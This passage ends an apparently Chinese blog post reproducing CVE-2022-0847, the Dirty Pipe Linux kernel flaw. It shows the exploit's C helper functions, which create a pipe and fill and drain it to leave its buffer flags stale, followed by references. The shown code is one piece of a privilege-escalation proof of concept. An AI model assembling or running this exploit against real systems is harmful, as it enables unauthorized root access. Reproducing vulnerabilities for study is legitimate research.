    free_env(my_pipe);
    close(fd_read);
    return 0;
}


/*
 * Creates the pipe used by the PoC and asks the kernel to shrink it to a
 * single page.
 *
 * my_pipe: array of two ints that receives the read end ([0]) and the
 *          write end ([1]).
 *
 * Exits with status 1 if the pipe cannot be created. A failing
 * F_SETPIPE_SZ is only reported: fill_pipe()/drain_pipe() query the actual
 * size with F_GETPIPE_SZ, so the PoC still works with a larger pipe.
 */
void initial_pipe(int *my_pipe)
{
    if (pipe(my_pipe) < 0) {
        perror("pipe");
        exit(1);
    }
    if (fcntl(my_pipe[1], F_SETPIPE_SZ, 1 * PAGE_SIZE) < 0)
        perror("fcntl(F_SETPIPE_SZ)");
}

/*
 * Writes 'A' bytes into the pipe until F_GETPIPE_SZ bytes have been
 * written, at most PAGE_SIZE bytes per write() call.
 *
 * my_pipe: pipe descriptors; only the write end my_pipe[1] is used.
 *
 * Exits with status 1 if the pipe size cannot be queried or a write fails
 * or makes no progress (previously a -1 return enlarged the remaining
 * count and the loop never terminated).
 */
void fill_pipe(int *my_pipe)
{
    char buffer[PAGE_SIZE];
    int pipe_size = fcntl(my_pipe[1], F_GETPIPE_SZ);

    if (pipe_size < 0) {
        perror("fcntl(F_GETPIPE_SZ)");
        exit(1);
    }
    printf("[*]pipe_size is %d\n", pipe_size);

    memset(buffer, 0x41, sizeof(buffer));
    while (pipe_size > 0) {
        size_t chunk = pipe_size > PAGE_SIZE ? (size_t)PAGE_SIZE : (size_t)pipe_size;
        ssize_t nr = write(my_pipe[1], buffer, chunk);

        if (nr < 0) {
            perror("fill pipe: write");
            exit(1);
        }
        if (nr == 0) {
            fprintf(stderr, "fill pipe: write made no progress\n");
            exit(1);
        }
        pipe_size -= (int)nr;
    }
    printf("[*]Fill the pipe done...\n");
}

/*
 * Reads F_GETPIPE_SZ bytes back out of the pipe, at most PAGE_SIZE bytes
 * per read() call, discarding the data.
 *
 * my_pipe: pipe descriptors; the size is queried on my_pipe[1] and the data
 *          is read from my_pipe[0].
 *
 * Exits with status 1 if the pipe size cannot be queried, a read fails, or
 * read() reports end-of-file (previously a 0 or -1 return kept the loop
 * spinning forever).
 */
void drain_pipe(int *my_pipe)
{
    char buffer[PAGE_SIZE] = {0};
    int pipe_size = fcntl(my_pipe[1], F_GETPIPE_SZ);

    if (pipe_size < 0) {
        perror("fcntl(F_GETPIPE_SZ)");
        exit(1);
    }
    printf("[*]pipe_size is %d\n", pipe_size);

    while (pipe_size > 0) {
        size_t chunk = pipe_size > PAGE_SIZE ? (size_t)PAGE_SIZE : (size_t)pipe_size;
        ssize_t nr = read(my_pipe[0], buffer, chunk);

        if (nr < 0) {
            perror("drain pipe: read");
            exit(1);
        }
        if (nr == 0) {
            fprintf(stderr, "drain pipe: unexpected end of file\n");
            exit(1);
        }
        pipe_size -= (int)nr;
    }
    printf("[*]Drain the pipe done...\n");
}

/*
 * Releases the PoC's pipe by closing both of its descriptors.
 *
 * my_pipe: array holding the read end ([0]) and the write end ([1]).
 *
 * The parameter is named my_pipe, matching the prototype and the sibling
 * helpers, so that it no longer shadows the libc pipe() function.
 */
void free_env(int *my_pipe)
{
    /* 1. Free the pipe */
    close(my_pipe[0]);
    close(my_pipe[1]);
}

参考

洞主原文章

精彩复现

folio是甚么


CVE-2022-0847漏洞复现
https://peiandhao.github.io/2024/05/15/CVE-2022-0847漏洞复现/
作者
peiwithhao
发布于
2024年5月15日
许可协议